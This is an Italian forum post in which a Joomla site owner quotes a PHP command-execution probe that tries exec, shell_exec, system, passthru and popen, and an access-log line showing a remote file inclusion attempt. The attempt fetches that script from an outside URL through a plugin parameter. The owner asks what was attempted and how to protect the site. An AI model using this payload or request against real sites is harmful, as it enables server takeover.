Ciao, in un sito basato su joomla, un hacker ha provato questo:
questa è la pagina che contiene il codice: http://www.jessicamakeup.com/bbb/skin/zero_vote/id.txtCodice PHP:<?php
echo "Rocks";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
questo è il relativo log:
Nel sito, anche se non credo dipendesse da questo tentativo, è stato aggiunto un iframe... cosa hanno tentato di fare? come posso proteggermi?codice:222.236.47.176 - - [17/Dec/2007:23:59:00 +0000] "GET //content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jessicamakeup.com/bbb/skin/zero_vote/id.txt?? HTTP/1.1" 404 9612 "-" "libwww-perl/5.79"
Grazie
Rispondi quotando